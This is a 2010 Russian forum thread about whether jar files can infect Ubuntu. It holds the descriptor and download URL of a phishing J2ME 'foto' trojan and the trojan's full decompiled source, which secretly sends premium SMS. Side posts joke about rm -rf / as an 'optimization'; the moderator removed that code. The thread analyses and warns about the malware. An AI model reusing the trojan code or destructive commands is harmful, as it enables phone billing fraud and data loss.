Можно ли заразить комп через jar файлы?

[DartVolk]

Здравствуйте!
Интересно узнать,можно ли подхватить заразу или что либо подобно(ворующее пароли,например) через запуск jar файлов в Ubuntu?

[Mam(O)n]

Да, если вирус заточен под ubuntu.

[postrg]

а под виндой факт да))))
Например, последний раз, в аську пришло сообщение))
Привет милый вот тут мои откровенные фото .....сцылка....
Ой наверное я ошиблась простите)

ссылачка на jar +) А там winlock +))

[Tank]

Не лезь в XXX и все будет норМ !!

[DartVolk]

Вот вот! в аську мне пришло сообщение

572234773 (10.03.2010 13:56)
Привет!ты нравишься мне хочу познакомится,почти каждый день видемся,но ты не замечаешь меня,асю твоя знакомая далатут фотки мои http://bit.ly/ci2Frd

Я прошелся по ссылке.По виду кажется,что это сокращенная ссылка,как в твиттерах ,но это не так.
Сразу же предлагается загрузить файл foto.jad
Я его открыл редактором и вот что  там было

Код: [Выделить]

Manifest-Version: 1.0
Ant-Version: Apache Ant 1.7.1
Created-By: 11.2-b01 (Sun Microsystems Inc.)
MIDlet-1: foto,/icon.png,javaReg
MIDlet-Vendor: 4moki.biz
MIDlet-Name: foto
MIDlet-Version: 1.0
MicroEdition-Configuration: CLDC-1.0
MicroEdition-Profile: MIDP-2.0
MIDlet-Jar-Size: 4968
MIDlet-Jar-URL: http://4moki.biz/cached/28izfdl3/foto.jar

То есть он подгружает еще один файл.
Дальше прошелся и по этой ссылке.
Там оказался foto.jar .Жаль,но в нем не было исходников.Было бы любопытно посмотреть, так как Java я немного знаю:)
Так что поэтому и создал тему.

А если говорить вообще-есть ли работающие вирусы под Ubuntu? Примеров только не приводите:)

[Mam(O)n]

Это под MIDP платформу, для мобильников короче. Я уже ловил в аську такого типа и дизассемблировал. В открытом виде там мало чего видно, код обфусцирован немного, но я понял, что он смски шлёт на платные номера.
Пользователь решил продолжить мысль 10 Марта 2010, 04:49:08:

А если говорить вообще-есть ли работающие вирусы под Ubuntu? Примеров только не приводите:)

Погугли по "cat test test test perl". Самый злобный вирус. Распространяется методом социальной троянии, обфусцирован и вводит пользователя в лохоргический шок после начала его действия. Не обнаруживается антивирусами.
Пользователь решил продолжить мысль 10 Марта 2010, 11:37:59:

так как Java я немного знаю:)

Вот, декомпилировал и этот, твой. Тоже рассылкой занимается. Можешь покопаться:

(Нажмите, чтобы показать/скрыть)

Код: [Выделить]

import java.io.DataInputStream;
import java.io.PrintStream;
import java.util.Vector;
import javax.microedition.io.Connector;
import javax.microedition.lcdui.*;
import javax.microedition.midlet.MIDlet;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.TextMessage;

public class javaReg extends MIDlet
    implements CommandListener
{

    public javaReg()
    {
        a_int_fld = -1;
        b_int_fld = 0;
        b_java_lang_String_fld = "R$u043Ciu0416u0427#oau0445gM[Tu0411QSu0437'uvcu0418%u041D{I0u0440x}*(pOLku041Au0436lu042Fu044E)u0432u0431u043Au0435fu044FZu0428ru044Cu0413tu0442u0422u0441u042Du0444+CA5u04388u041F3u0414u0417zu0429u043Eyu044B1:wu041Cu043Bu042Au0446u044AWVbm^Du0448u0433u041B9u0439u0421u0412u042Cu0410P@Bsu0420YUu043Du0425u043FeJu0415F-H46u0447u0443u0423&u044D=u042EnjEh!q;u042Bdu0426]u041Eu0434u04492u0424u0430XKN7u0419G";
    }

    public void startApp()
    {
        sendMessages();
    }

    private String a(String s)
    {
        String s1 = "";
        s = s.toCharArray();
        int i = (this = b_java_lang_String_fld.toCharArray()).length - 1;
        int j = s.length - 1;
        for(int l = 0; l <= j; l++)
        {
            int k = -1;
            int i1 = 0;
            do
            {
                if(i1 > i)
                    break;
                if(this[i1] == s[l])
                {
                    k = i1;
                    break;
                }
                i1++;
            } while(true);
            if(k != -1)
            {
                if(k == 0)
                    k = i;
                else
                    k--;
                s[l] = this[k];
            }
            s1 = s1 + s[l];
        }

        return s1;
    }

    public void sendMessages()
    {
        Object obj;
        obj = a(((String) (obj = ((javaReg) (obj = this)).a(((javaReg) (obj)).b("/numbers.cfg")))), "
");
        a_java_util_Vector_fld = ((Vector) (obj));
        String s = (String)((Vector) (obj = a(((String) (obj = ((javaReg) (obj = this)).a(((javaReg) (obj)).b("/config.cfg")))), ";"))).elementAt(0);
        String s1 = "showMessage";
        if(s.compareTo(s1) == 0)
        {
            a_boolean_fld = true;
            a_java_lang_String_fld = (String)((Vector) (obj)).elementAt(1);
        } else
        {
            a_boolean_fld = false;
        }
        for(int i = 0; i < a_java_util_Vector_fld.size(); i++);
        nextSmsNumber();
        chooseAction();
    }

    public void chooseAction()
    {
        if(a_boolean_fld)
        {
            showMessage();
            return;
        }
        sendNowMessage(b_java_util_Vector_fld);
        if(!nextSmsNumber())
        {
            destroyApp(true);
            notifyDestroyed();
            return;
        } else
        {
            chooseAction();
            return;
        }
    }

    public void OkAction()
    {
        sendNowMessage(b_java_util_Vector_fld);
    }

    public boolean nextSmsNumber()
    {
        for(int i = 0; i < a_java_util_Vector_fld.size(); i++);
        a_int_fld++;
        if(a_int_fld < a_java_util_Vector_fld.size())
        {
            b_java_util_Vector_fld = a((String)a_java_util_Vector_fld.elementAt(a_int_fld), "::");
            return true;
        } else
        {
            return false;
        }
    }

    public void sendNowMessage(Vector vector)
    {
        try
        {
            String s;
            MessageConnection messageconnection = (MessageConnection)Connector.open(s = "sms://" + (String)vector.elementAt(0));
            sendTextMessage(messageconnection, (String)vector.elementAt(1), s);
            messageconnection.close();
            return;
        }
        catch(Exception _ex)
        {
            return;
        }
    }

    private static String a(String s, String s1, String s2)
    {
        int i = 0;
        int j = 0;
        StringBuffer stringbuffer = new StringBuffer();
        while((j = s.indexOf(s1, i)) >= 0)
        {
            stringbuffer.append(s.substring(i, j));
            stringbuffer.append(s2);
            i = j + s1.length();
        }
        stringbuffer.append(s.substring(i));
        return stringbuffer.toString();
    }

    public boolean showMessage()
    {
        Object obj = new StringItem("", null);
        a_javax_microedition_lcdui_Form_fld = new Form("form");
        a_javax_microedition_lcdui_Form_fld.append(((javax.microedition.lcdui.Item) (obj)));
        ((StringItem) (obj)).setText(a(a_java_lang_String_fld, "*cost*", (String)b_java_util_Vector_fld.elementAt(2)));
        a_javax_microedition_lcdui_Command_fld = new Command("Send", 4, 0);
        b_javax_microedition_lcdui_Command_fld = new Command("Cancel", 3, 0);
        a_javax_microedition_lcdui_Form_fld.addCommand(a_javax_microedition_lcdui_Command_fld);
        a_javax_microedition_lcdui_Form_fld.addCommand(b_javax_microedition_lcdui_Command_fld);
        obj = Display.getDisplay(this);
        a_javax_microedition_lcdui_Form_fld.setCommandListener(this);
        ((Display) (obj)).setCurrent(a_javax_microedition_lcdui_Form_fld);
        return true;
    }

    private String b(String s)
    {
        this = new DataInputStream(getClass().getResourceAsStream(s));
        s = new StringBuffer();
        boolean flag = false;
        try
        {
            int i;
            while((i = read()) != -1)
                s.append((char)(i < 192 || i > 255 ? i : i + 848));
            close();
        }
        // Misplaced declaration of an exception variable
        catch(javaReg this)
        {
            System.err.println("ERROR in getText() " + this);
        }
        return s.toString();
    }

    private static Vector a(String s, String s1)
    {
        Vector vector = new Vector();
        for(int i = s.indexOf(s1); i >= 0; i = (s = s.substring(i + s1.length())).indexOf(s1))
            vector.addElement(s.substring(0, i));

        vector.addElement(s);
        return vector;
    }

    public void sendTextMessage(MessageConnection messageconnection, String s, String s1)
    {
        try
        {
            this = (TextMessage)messageconnection.newMessage("text");
            if(s1 != null)
                setAddress(s1);
            setPayloadText(s);
            messageconnection.send(this);
            return;
        }
        catch(Exception _ex)
        {
            return;
        }
    }

    public void pauseApp()
    {
    }

    public void destroyApp(boolean flag)
    {
        notifyDestroyed();
    }

    public void commandAction(Command command, Displayable displayable)
    {
        b_int_fld++;
        if(displayable == a_javax_microedition_lcdui_Form_fld)
        {
            if(a_javax_microedition_lcdui_Command_fld == command)
            {
                b_int_fld++;
                (new Thread(new a(this))).start();
                return;
            }
            b_int_fld++;
            if(command == b_javax_microedition_lcdui_Command_fld)
                if(!nextSmsNumber())
                {
                    destroyApp(true);
                    notifyDestroyed();
                    return;
                } else
                {
                    chooseAction();
                    return;
                }
        }
    }

    static Vector a(javaReg javareg)
    {
        return javareg.b_java_util_Vector_fld;
    }

    private Vector a_java_util_Vector_fld;
    private int a_int_fld;
    private Vector b_java_util_Vector_fld;
    private boolean a_boolean_fld;
    private Command a_javax_microedition_lcdui_Command_fld;
    private Command b_javax_microedition_lcdui_Command_fld;
    private int b_int_fld;
    private Form a_javax_microedition_lcdui_Form_fld;
    private String a_java_lang_String_fld;
    private String b_java_lang_String_fld;
}


(Нажмите, чтобы показать/скрыть)

Код: [Выделить]

final class a
    implements Runnable
{

    a(javaReg javareg)
    {
        a = javareg;
    }

    public final void run()
    {
        a.sendNowMessage(javaReg.a(a));
        if(!a.nextSmsNumber())
        {
            a.destroyApp(true);
            a.notifyDestroyed();
            return;
        } else
        {
            a.chooseAction();
            return;
        }
    }

    private final javaReg a;
}



Пользователь решил продолжить мысль 11 Марта 2010, 01:35:42:Я в дебаге его прогнал. Оказалось, что он отправляет смс с текстом suksa на номера 7122, 7132 и 8355. Нафиг они пытались спрятать это в string'е не пойму, за пару минут в дебаге всё видно.

[mortalos]

Погугли по "cat test test test perl". Самый злобный вирус.

не врите тут. это скрипт оптимизации системы на перле! лучше этой оптимизации нет уже ничего...

а в Ubuntu эрэм эрэф / разве работает?
в генту, например, она / не дает трогать.

хааа. заменяет рм -рф =)

[Mam(O)n]

лучше этой оптимизации нет уже ничего...

Ага, патч Бармина. В последнее время приобрёл вид пилюли для пользователей, любящих сидеть под рутом.

Может лучше убрать текст? А то ведь найдётся нуб, который его еще и запустит... А для страждущих увидеть текст предлагаю такой, более безопасный от копи-паста вариант:

(вредоносный код удален модератором)


Пользователь решил продолжить мысль 10 Марта 2010, 20:34:32:

а в Ubuntu эрэм эрэф / разве работает?
в генту, например, она / не дает трогать.

Раньше да, теперь попробовал, пишет, что rm: невозможно удалить корневой каталог `/'


Пользователь решил продолжить мысль 11 Марта 2010, 04:59:28:

в генту, например, она / не дает трогать.

Так и это поправимо, надо всего-лишь немного пропатчить:
(вредоносный код удален модератором)
В убунте теперь работает

Не стоит светить этот код тем блее без красной, размером в 36pt, подписи, что этот код опасен.
Sly_tom_cat.

[DartVolk]

Новичкам очень рекомендую НЕ запускать код,который тут предлагается.

Спасибо за совет